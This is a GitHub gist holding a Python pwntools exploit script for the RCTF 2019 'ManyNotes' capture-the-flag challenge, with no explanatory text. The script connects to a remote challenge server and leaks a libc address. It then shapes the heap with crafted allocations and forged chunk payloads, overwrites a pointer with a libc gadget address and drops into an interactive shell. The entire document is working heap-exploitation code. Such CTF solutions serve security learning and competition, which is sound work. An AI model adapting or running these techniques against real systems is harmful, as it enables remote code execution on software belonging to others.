Skip to content

Instantly share code, notes, and snippets.

@hama7230
Created May 20, 2019 05:14
Show Gist options
  • Save hama7230/12cbac9e00105375fad909631bda56fd to your computer and use it in GitHub Desktop.
Save hama7230/12cbac9e00105375fad909631bda56fd to your computer and use it in GitHub Desktop.
RCTF 2019 ManyNotes
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('./libc.so.6')
elf = ELF('./many_notes')
context(os='linux', arch=elf.arch)
# context(log_level='debug') # output verbose log
RHOST = "123.206.174.203"
RPORT = 20003
LHOST = "127.0.0.1"
LPORT = 20003
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./many_notes'], gdbscript=gdbscript)
else:
#conn = process(['./many_notes'])
conn = process(['./many_notes'], env={'LD_LIBRARY_PATH': './'})
if opt == 'a': gdb.attach(conn)
# exploit
log.info('Pwning')
def add(size, pad, ip, p):
conn.sendlineafter('Choice:', '0')
conn.sendlineafter('Size', str(size))
conn.sendlineafter('Padding', str(pad))
if ip:
conn.sendlineafter('Input? (0/1):', '1')
conn.sendafter('Content', p)
else:
conn.sendlineafter('Input? (0/1):', '0')
conn.send('x'*0x8)
conn.recvuntil('x'*0x8)
libc_base = u64(conn.recv(6) + '\x00'*2) - 0x3ab720
dbg('libc_base')
print hex(libc_base & 0xfffffffff8000000)
add(0x2000, 0x0, False, '')
for i in range(0x16):
print i
add(0x2000, 0x400, False, '')
add(0x2000, 0x3ff, False, '')
add(0x2000, 0x3b6, False, '')
add(0x1f00, 0, False, '')
add(0x100, 0x4, False, '')
payload = p64(0) + p64(0x75)
payload += p64(0xbfffe50 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffe70 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffe90 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffea0 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(libc_base+0x3dabed) + p64(0)
add(0x140, 0, True, payload.ljust(0x130, 'w'))
payload = 'w'*0xa0
payload += p64((libc_base & 0xfffffffff8000000)+0x20) + p64(0)
payload += p64(0x0000000003fff000) * 2
payload += p64(0x0000000300000000) + p64(0)
payload += '\x00'*0x20 + p64( 0xbfffe30 - 0x10000000 + (libc_base & 0xfffffffff8000000))
time.sleep(0.001)
print hex(len(payload))
conn.send(payload)
payload = '\x00'*3 + p64(0xdead) * 2
payload = payload.ljust(0x40, 'a') + p64(libc_base + 0x3aac10) + p64(0) *3
add(0x60, 0, True, payload)
add(0x68, 2, False, '')
add(0x68, 0, True, p64(libc_base + 0xdea81).ljust(0x68,'\x00'))
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment